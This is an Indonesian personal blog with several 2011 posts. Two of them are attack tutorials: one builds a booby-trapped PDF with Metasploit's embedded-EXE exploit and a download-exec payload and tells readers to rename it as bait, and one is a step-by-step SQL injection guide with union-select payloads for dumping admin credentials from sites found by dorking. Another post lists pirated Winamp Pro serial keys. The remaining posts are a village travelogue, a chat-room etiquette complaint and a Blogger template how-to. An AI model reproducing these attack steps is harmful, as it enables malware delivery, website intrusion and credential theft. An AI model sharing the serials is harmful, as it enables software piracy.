Rabu, 28 September 2011

Membuat Malicious Code dengan menggunakan Metasploit

Mungkin sebagian besar orang-orang yg bergelut di bidang IT pernah mendengar ataupun pernah memakai salah satu Framework Development Vulnerability ini,Yup, jika anda belum pernah mengenal apa itu Metasploit silahkan anda mengunjungi situs utamanya yaitu http://metasploit.com dan referensi nya melalui search engine kesukaan anda.

Pada kali ini saya akan menggambarkan salah satu teknik Blackhat dalam memanfaatkan Metasploit sebagai senjata yang powerfull dalam menyebarkan Malicious Code baik itu Trojan, Virus, Botnet, ataupun Rootkit melalui teknik rekayasa social (Social Enginering).
Ok, buat persiapan kita akan mempersiapkan sebuah File PDF dan Virus (Fake).
Untuk file virus palsu kita coba bangun dari sebuah bahasa Visual Basic.Berikut potongan kodenya. Yg mana jika tombol ditekan maka akan menghasilkan tulisan “Selamat Komputer Anda Kena Virus ”


Code:
Private Sub Command1_Click()Text1.Text = "Selamat Komputer Anda Kena Virus :D"End Sub



Setelah Virus Palsu, Selanjutnya kita perlu menyiapkan sebuah File e-book untuk media sosial engginering dan Metasploit sebagai Alat untuk meracik kedua file tersebut.Proses Meracik Adonan
  1. Download dan Instal metasploit anda
  2. Setelah installasi selesai, pilihlah metasploit web yaitu pada Start –> Metasploit Framework –> msfweb
  3. Setelah load pilih tab Exploit dan carilah exploit “Adobe PDF Embedded EXE Social Engineering”. Exploit ini dapat berjalan pada Adobe Reader v8.x, v9.x



4. Pilih “windows/download_exec”



5. Selanjutnya kita akan dihadapkan kepada pengaturan standart untuk menkonfigurasi file yang akan diracik. EXENAME : Path / Directory tempat File Virus berada
ex my linux directory: /home/valencia/contoh_virus.exe

INFILENAME : Path / Directory tempat E-BOOK / PDF berada
ex my linux directory : /home/valencia/ebook_palsu.pdf

FILENAME : Merupakan Output Hasil File
ex: evil.pdf

LAUNCH MESSAGE : Pesan kesalahan yg ditampilkan
ex : To view the encrypted content please tick the
"Do not show this message again" box and press Open.

OUTPUTPATH : Path / Directory tempat File gabungan berada
ex my linux directory: /home/valencia/

URL : Alamat web yg digunakan untuk mendownload executable.
ex : http://site-fake.com/evil_update.pdf
6. Selanjutnya klik tombol Launch Exploit. Jika berhasil maka akan ada file baru yg bernama evil.pdf di path /home/valencia/




Setelah semua adonan selesai diracik saatnya melakukan penyebaran dengan teknik social enginering. File hasil generate yg bernama evil.pdf bisa di Rename dengan judul yg menarik minat seseorang untuk mengeksekusinya, misalnya “ Cara Mendapatkan Uang Gratis Di Internet”.

Ok, ga perlu dijelaskan bagaimana cara menyebarkan, karena saya yakin anda terlalu pintar untuk itu...lolz J
Sekarang kita lihat , bagaimana jika file itu kita eksekusi. Apakah dengan teknik ini file virus palsu dapat berjalan jika e-book itu dijalankan ?




-
Setelah di jalankan, file evil.pdf tadi akan menjalankan command prompt dan kemudian menampilkan pesan error sesuai dengan LAUNCH MESSAGE yg kita setting tadi.

- Dan jika kita menutup dialog box dari error tersebut maka program virus palsu yg berada pada badan file evil.pdf tersebut akan dijalankan dan menampilkan pesan.
Dari ilustrasi teknik di atas, mungkin anda akan berpikir jika dulu E-book yg ada di internet bukanlah sesuatu ancaman bagi anda tapi sekarang mereka bisa menjadi ancaman serius bagi keamanan anda.

Coba bayangkan, file yg diselipkan itu adalah sebuah program yang bertugas mencuri data banking seperti Zeus, SpyEye. Saya yakin E-book yang ada dalam PC / Laptop anda sudah masuk ke Recycle Bin (Just Kidding .)Anyway.......sekian bahasan pendek yg bisa saya sampaikan. Moga saja kita dapat lebih aware terhadap ancaman-ancaman yang ada di dunia maya.

Salam

Jumat, 16 September 2011

berbagi password winamp pro

langsung saja ini pasword winamp pro... pilih salah satu saja.. maka winamp free anda menjadi pro

Name : admin
Serial : CWAZY-C3KW6-QZBOO-UZHOS

Name : admin
Serial : OW7Z8-Q3MHN-TCYRE-JSKUK

Name : admin
Serial : 3CRDU-RRPXX-NBUE8-83DRR

Name : admin
Serial : 2EZ9F-RRUSW-KY3UD-V3C65

Name : admin
Serial : HYABY-WBW7X-VAASJ-HJJKS

Name : admin

Serial : BCJ3X-YYXZF-4CKLO-JOB6S

belajar SQLi scanner

1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..
kalau aku sih pake SQLi Scanner di
http://revtan.site40.net/scanner/? ama http://adf.ly/9GHb
2. pilih aja dork listnya:
untuk list dork:
di wild-hack.blogspot.com
3.
untuk yang pakai manual cek di google/bing:
contoh: http://site.com/index.php?id=1' <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

berarti Webnya bisa di hack

untuk yang pakai scanner : udah disediain web yang bisa dihack

4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error

example:
http://site.com/index.php?id=1 order by 1-- <-- no error
http://site.com/index.php?id=1 order by 2-- <-- no error
http://site.com/index.php?id=1 order by 3-- <-- no error
http://site.com/index.php?id=1 order by 4-- <-- ERROR..!

5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
http://site.com/index.php?id=-1 union all select 1,2,3--

(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)

6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:

http://site.com/index.php?id= union all select 1,@@version,3--

7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!

8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()
ex:

http://site.com/index.php?id= union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
1. buka link: http://adf.ly/9GIB
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex:
jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273
ex:
http://site.com/index.php?id=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--

10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password contoh:
group_concat(username,0x3a,password)
<- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a
lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users)
maka from users--
example
http://site.com/index.php?id=-1 union all select 1,group_concat(username,0x3a,password)3 from users--
11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~
kalo ada yang punya berbagi karna
dari berbagi dapat sukses

Indahnya pemandangan di kadu gagak

Dingin begitulah keadaan disini desa cilentung di lereng gunung Girang menes Pandeglang jalan yang rusak ditambah naik turun menuju desa bukan lagi menjadi beban pikiran, Kali ini ku berkunjung untuk bersilaturahmi dengan keluarga sekaligus ingin refresing hehehe lebay dikit :D, suasana yang serba hijau ini yang membuat pikiran menjadi tentram kebetulan siang ini di ajak paman pergi ke sawah untuk memetik cabe.. Perlengkapanpun siap kantong yg siap menampung cabe, pisau dan tidak lupa membawa kamera untuk mendokumentasikan pemandangan yang indah setelah sesampai di sawah... Kadu gagak begitulah nama desa tempat sawah ini berada, kadu gagak nama ini diambil konon sejak dahulu disini banyak pohon kadu(durian) yang sering dihinggapi gagak mangkanya daerah ini disebut kadu gagak tetapi saat ini jangan harap anda bisa melihat gagak pohon kadu pun disini sudah tidak ada, 
air yang mengalir langsung dari pegunungan yang sudah tentu jernih dan dingin terlihat jelas dari sini gunung girang yang dihiasi pepohonana hijau dan kabut, padi yang sudah di panen. Sambil memetik cabe Aku pun tidak lupa memotret pemandangan... Tidak tersa memetik cabe pun selesai kami pun bergegas pulang kembali ke rumah sudah pasti kali ini kami pulang akan menanjak setelahnya datang kesawah dengan menuruni gunung girang beban kali ini sudah pasti agak berat karena keadaan menanjak dan membawa cabe yang sekatong full sekali lagi ini bukanlah masalah. Begitulah sekilas kesenangan ku berada disini yg tidak bisa kuceritakan keseluruhan, ingin sekali ku berbagi kesenangan ku dengan kalian andai kalian ingin berkunjung ke rumahku yang berada di lereng gunung girang desa cilentung kabupaten cisata menes pandeglang... 

Tidak lupa aku butuh Kritik dan saran dari kalian untuk memperbaiki website ku ini jika ada kritik dan saran kalian tolong layangkan ke Emailku
Terima Kasih

Senin, 12 September 2011

Nimbuzz Obrolan Bersama.

Sebagian dari Anda pasti sudah mengetahui Nimbuzz, ya benar Nimbuzz adalah salah satu aplikasi Instant Messanger yg di dalamnya terdapat room atau tempat untuk mengobrol atau berbagi hal,
ketika aku mencoba aplikasi ini memang asik untuk mengobrol akan tetapi ada saja perusak ke asikanku ketika join di salah satu room jika anda pengguna Nimbuzz lama pasti sudah tahu akan hal ini yang Pertama adanya flooder yg sangat mengganggu, mungkin dari kalian sudah tahu akan flooder, Flooder diambil dari bahasa Inggris Flood yg berarti Banjir jdi flooder dapat di artikan posting yg membanjiri room atau posting yg berlebih lebihan mereka melupakan akan arti chatting itu sendiri mereka melakukan itu mungkin meluapkan kekesalan kepada pemilik room (owner) yg selalu meng kick atau banned kepadanya atau hal lainnya. itu hanya hal kecil yg ku ketahui tentang flooder. yang Kedua orang yg tidak mengetahui arti dari posting room aku ketika memasuki room banyak orang yg selalu posting pasangan posting room yg di tunjukan kepada pacarnya saja tanpa memperdulikan orang lain posting yg menunjukan sikap mesra dgn pasangan di room mungkin mereka ini melupakan kegunaan dari pv atau kepanjangan dari private message, entahlah ah lebay. yang Ketiga posting kata kasar kata yg tidak senonoh atau berkata kotor di tambah pula pict profile bugil bnyk sekali orang yg berkata kotor seperti berkata Bangs_t, anji_g dll. dan juga berkata kotor seperti menyebutkan nama jenis kelamin dll. mereka lupa atau melupakan bahwa aplikasi ini semua umur boleh registrasi jdi tidak semua yg mempergunakan aplikasi ini hanya orang dewasa bukan tidak mungkin anak anak dibwah umur jg ikut join di room... hal itulah yg ku ketahui tentang room nimbuzz mungkin ada yg mau menambahkan. Mobile / PC

Cara Membuat Read More / Baca Selengkapnya

Biasanya postingan terbaru akan ditampilkan dihalaman utama blog. Namun jika postingan terlalu panjang maka hal tersebut akan membuat penuh halaman utama. Jika ingin supaya postingan yang ditampilkan dihalaman utamacuma abstraksinya saja kemudian ada sebuah link Read More / Baca Selengkapnya untuk melihat selengkapnya maka ikutilah langkah-langkah berikut:
1. Buka menu Layout kemudian pilih Edit HTML.

2. Kasih tanda cek (centang) pada cekbox "expand widget template"

3. Cari kode berikut di Template blog kamu (tempatnya kira-kira pada 1/4 bagian bawah kode hmtl) :

kotak "expand widget templateny" dicentang dulu.

<div class='post-body entry-content'>

kalo ketemu maka dibawahnya ada kode ini :

<p><data:post.body/></p>
4. Kalau sudah ketemu, Ganti kode yang ini <p><data:post.body/></p> menjadi seperti ini :

<b:if cond='data:blog.pageType == "item"'>
<style>.fullpost{display:inline;}</style>
<p><data:post.body/></p>
<b:else/>
<style>.fullpost{display:none;}</style>

<p><data:post.body/></p>

<a expr:href='data:post.url'>Read More......</a>
</b:if>

Tulisan "Read More....." itu bisa diubah, misalnya jadi "Baca Selengkapnya".

5. Simpan hasil pengeditan.
6. Kemudian pilih menu Setting lalu pilih Formatting
7. Pada kotak Post Template isikan kode berikut:

<span class="fullpost">
</span>
8. Kemudian Simpan.

9. Ketika memposting, disana ada 2 tab pilihan, yang "Compose" dan "Edit Html", pilih Yang "Edit HTML", Maka secara otomatis akan tampak kode seperti berikut :

<span class="fullpost">

</span>


10. Letakkan abstraksi posting atau artikel yang akan ditampilkan dihalama utama (sebelum tulisan "Redmore") diatas kode ini : <span class="fullpost"> sementara sisanya yaitu keseluruhan posting letakkan di antara kode <span class="fullpost"> dan </span>

11. Selesai